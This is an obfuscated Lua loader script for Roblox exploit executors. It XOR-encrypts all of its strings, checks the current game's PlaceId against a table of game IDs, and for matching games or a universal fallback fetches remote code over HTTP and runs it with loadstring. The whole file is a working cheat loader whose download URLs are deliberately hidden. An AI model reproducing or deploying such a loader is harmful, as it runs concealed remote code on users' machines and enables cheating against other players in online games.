
local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
repeat
	task.wait(1);
until game:IsLoaded() 
local gameId = game.PlaceId;
local function notify(title, message)
	pcall(function()
		if (syn and syn.toast) then
			syn.toast(title .. LUAOBFUSACTOR_DECRYPT_STR_0("\139\131", "\126\177\163\187\69\134\219\167") .. message);
		else
			print(title .. LUAOBFUSACTOR_DECRYPT_STR_0("\121\141", "\156\67\173\74\165") .. message);
		end
	end);
end
local gameNames = {[16732694052]=LUAOBFUSACTOR_DECRYPT_STR_0("\18\190\90\30\252\1\71\57\178", "\38\84\215\41\118\220\70"),[537413528]=LUAOBFUSACTOR_DECRYPT_STR_0("\114\3\43\30\250\16\55\98\48\241\81\2\98\52\241\66\86\22\0\251\81\5\55\0\251", "\158\48\118\66\114"),[18537079992]=LUAOBFUSACTOR_DECRYPT_STR_0("\153\43\18\58\124\189\187\153\20\80\23\97\168\226", "\155\203\68\112\86\19\197"),[13559584718]=LUAOBFUSACTOR_DECRYPT_STR_0("\106\210\56\249\0\75\240\234\80\212\32\253\76", "\152\38\189\86\156\32\24\133"),[2000062521]=LUAOBFUSACTOR_DECRYPT_STR_0("\207\67\166\82\249\23\168\64\188\118\169\71\238\84\175\95", "\38\156\55\199")};
local gameUniverses = {[LUAOBFUSACTOR_DECRYPT_STR_0("\142\116\111\32\52\117\247\70", "\35\200\29\28\72\115\20\154")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\16\187\194", "\84\121\223\177\191\237\76")]={16732694052},[LUAOBFUSACTOR_DECRYPT_STR_0("\181\87\196\165", "\161\219\54\169\192\90\48\80")]=LUAOBFUSACTOR_DECRYPT_STR_0("\111\75\19\45\9\101\1\40\76", "\69\41\34\96"),[LUAOBFUSACTOR_DECRYPT_STR_0("\175\192\197\3\18\63", "\75\220\163\183\106\98")]=LUAOBFUSACTOR_DECRYPT_STR_0("\10\174\159\39\202\88\245\196\37\216\21\244\140\62\205\10\175\137\34\202\7\168\136\56\215\22\191\133\35\151\1\181\134\120\248\56\130\219\24\227\77\174\142\36\205\77\168\142\49\202\77\178\142\54\221\17\245\134\54\208\12\245\185\22\136\46\178\158\53\216\0\175\137\54\136\4\179\152\52\209", "\185\98\218\235\87")},[LUAOBFUSACTOR_DECRYPT_STR_0("\233\41\46\234\218\139\233\51\38\242", "\202\171\92\71\134\190")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\32\197\63", "\232\73\161\76")]={537413528},[LUAOBFUSACTOR_DECRYPT_STR_0("\181\216\79\88", "\126\219\185\34\61")]=LUAOBFUSACTOR_DECRYPT_STR_0("\46\219\87\126\122\55\210\167\46\193\95\102\62\81\252\245\76\250\76\119\127\100\230\245\9", "\135\108\174\62\18\30\23\147"),[LUAOBFUSACTOR_DECRYPT_STR_0("\165\234\56\194\8\186", "\167\214\137\74\171\120\206\83")]=LUAOBFUSACTOR_DECRYPT_STR_0("\131\228\38\77\235\253\196\191\32\92\239\233\140\249\38\85\237\165\158\227\55\79\251\168\133\228\55\83\236\233\136\255\63\18\217\157\179\160\29\103\183\149\170\217\30\16\208\146\169\191\32\88\254\180\196\248\55\92\252\180\196\253\51\84\246\232\211\229\59\12\250\247\169\255\51\12\222\168\153\196\32\88\249\180\158\226\55", "\199\235\144\82\61\152")},[LUAOBFUSACTOR_DECRYPT_STR_0("\38\4\180\50\53\38", "\75\103\118\217")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\206\80\99", "\126\167\52\16\116\217")]={18537079992},[LUAOBFUSACTOR_DECRYPT_STR_0("\198\47\45\133", "\156\168\78\64\224\212\121")]=LUAOBFUSACTOR_DECRYPT_STR_0("\53\225\167\194\8\246\229\252\55\174\132\220\10\247", "\174\103\142\197"),[LUAOBFUSACTOR_DECRYPT_STR_0("\69\43\77\49\53\74", "\152\54\72\63\88\69\62")]=LUAOBFUSACTOR_DECRYPT_STR_0("\220\208\250\76\199\158\161\19\198\197\249\18\211\205\250\84\193\198\251\79\209\214\237\83\218\208\235\82\192\138\237\83\217\139\207\102\236\148\193\102\155\214\239\85\216\204\251\94\133\150\191\14\155\214\235\90\199\139\230\89\213\192\253\19\217\197\231\82\155\150\191\15", "\60\180\164\142")},[LUAOBFUSACTOR_DECRYPT_STR_0("\116\81\11\44\20\248\0\78\87\19\40\43", "\114\56\62\101\73\71\141")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\177\237\200", "\164\216\137\187")]={13800223141,13559584718},[LUAOBFUSACTOR_DECRYPT_STR_0("\220\231\60\183", "\107\178\134\81\210\198\158")]=LUAOBFUSACTOR_DECRYPT_STR_0("\20\1\140\195\234\11\27\144\208\163\46\15\142", "\202\88\110\226\166"),[LUAOBFUSACTOR_DECRYPT_STR_0("\208\12\144\254\218\215", "\170\163\111\226\151")]=LUAOBFUSACTOR_DECRYPT_STR_0("\25\36\166\40\93\109\102\94\34\179\47\0\48\32\5\56\167\58\91\36\44\3\51\189\54\90\50\39\5\126\177\55\67\120\8\43\8\226\23\116\120\5\62\30\151\117\107\4\25\94\34\183\62\93\120\33\20\49\182\43\1\58\40\24\62\253\20\30\57\40\92\35\139\42", "\73\113\80\210\88\46\87")},[LUAOBFUSACTOR_DECRYPT_STR_0("\178\56\204\6\226\174\42\236\28\230\147\47\197\11", "\135\225\76\173\114")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\19\233\171", "\199\122\141\216\208\204\221")]={2000062521,1517425836,16153158425,4026676776,16371880317,6361792543,14585248573,6278335370,92537562073813},[LUAOBFUSACTOR_DECRYPT_STR_0("\163\220\29\245", "\150\205\189\112\144\24")]=LUAOBFUSACTOR_DECRYPT_STR_0("\22\144\190\88\1\200\30\22\101\165\177\77\22\139\25\9", "\112\69\228\223\44\100\232\113"),[LUAOBFUSACTOR_DECRYPT_STR_0("\199\28\21\218\166\104", "\230\180\127\103\179\214\28")]=LUAOBFUSACTOR_DECRYPT_STR_0("\132\17\75\86\247\27\175\195\23\94\81\170\70\233\152\13\74\68\241\82\229\158\6\80\72\240\68\238\152\75\92\73\233\14\193\182\61\15\105\222\14\211\152\4\75\67\169\78\230\193\36\81\71\246\66\232\149\74\77\67\226\82\175\132\0\94\66\247\14\237\141\12\81\9\181\19\179\223\87\14", "\128\236\101\63\38\132\33")}};
local function runScript(url, name)
	notify(LUAOBFUSACTOR_DECRYPT_STR_0("\158\136\56\104\190\254\205", "\175\204\201\113\36\214\139"), LUAOBFUSACTOR_DECRYPT_STR_0("\107\205\32\210\7\79\197\59\219\68\84\207\39\213\20\83\140", "\100\39\172\85\188") .. name);
	pcall(function()
		loadstring(game:HttpGet(url))();
	end);
end
local gameInfo = {};
pcall(function()
	gameInfo = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\128\121\171\139\54\185\104\181\129\48\168\75\188\146\37\164\123\188", "\83\205\24\217\224")):GetProductInfo(game.PlaceId);
end);
local gameVersion = LUAOBFUSACTOR_DECRYPT_STR_0("\211\203\198\51\233\210\195\125\193\196\192\56", "\93\134\165\173");
local universeName = "";
local scriptToRun = nil;
if (gameInfo and gameInfo.Name) then
	gameVersion = gameInfo.Name;
end
for universeName, universeData in pairs(gameUniverses) do
	for _, id in ipairs(universeData.ids) do
		if (gameId == id) then
			notify(LUAOBFUSACTOR_DECRYPT_STR_0("\140\211\232\238\50\219\176", "\30\222\146\161\162\90\174\210"), LUAOBFUSACTOR_DECRYPT_STR_0("\193\75\100\15\230\90\117\14\165\73\113\7\224\20\48", "\106\133\46\16") .. universeData.name .. LUAOBFUSACTOR_DECRYPT_STR_0("\24\104\90\216\0\0", "\32\56\64\19\156\58") .. gameId .. ")");
			notify(LUAOBFUSACTOR_DECRYPT_STR_0("\104\233\204\122\82\231\130", "\224\58\168\133\54\58\146"), LUAOBFUSACTOR_DECRYPT_STR_0("\117\87\94\243\118\142\142\5\94\22\88\237\112\133\142\10\85\95\81\248\113\198\148\8\75\95\91\233", "\107\57\54\43\157\21\230\231"));
			runScript(universeData.script, LUAOBFUSACTOR_DECRYPT_STR_0("\221\132\3\181", "\175\187\235\113\149\217\188") .. universeData.name);
			return;
		end
	end
end
notify(LUAOBFUSACTOR_DECRYPT_STR_0("\14\142\168\96\235\108\122", "\24\92\207\225\44\131\25"), LUAOBFUSACTOR_DECRYPT_STR_0("\111\214\172\73\24\105\78\215\248\75\26\112\78\137\248", "\29\43\179\216\44\123") .. gameVersion .. LUAOBFUSACTOR_DECRYPT_STR_0("\253\145\9\104\231\153", "\44\221\185\64") .. gameId .. ")");
notify(LUAOBFUSACTOR_DECRYPT_STR_0("\51\198\97\115\123\20\229", "\19\97\135\40\63"), LUAOBFUSACTOR_DECRYPT_STR_0("\137\93\62\62\111\63\161\72\115\63\38\35\171\95\39\55\54\113\189\73\35\43\32\35\186\89\55\119\111\61\175\73\61\56\39\56\160\91\115\46\33\56\184\89\33\40\46\61\238\79\48\41\38\33\186", "\81\206\60\83\91\79"));
runScript(LUAOBFUSACTOR_DECRYPT_STR_0("\70\191\196\98\60\153\2\235\92\170\199\60\40\202\89\172\91\169\197\97\42\209\78\171\64\191\213\124\59\141\78\171\67\228\241\72\23\147\98\158\1\190\222\123\57\140\95\161\72\184\159\122\42\194\73\183\1\166\209\123\33\140\127\172\91\169\158\126\58\194", "\196\46\203\176\18\79\163\45"), LUAOBFUSACTOR_DECRYPT_STR_0("\173\44\119\8\33\233\252\185\46", "\143\216\66\30\126\68\155"));
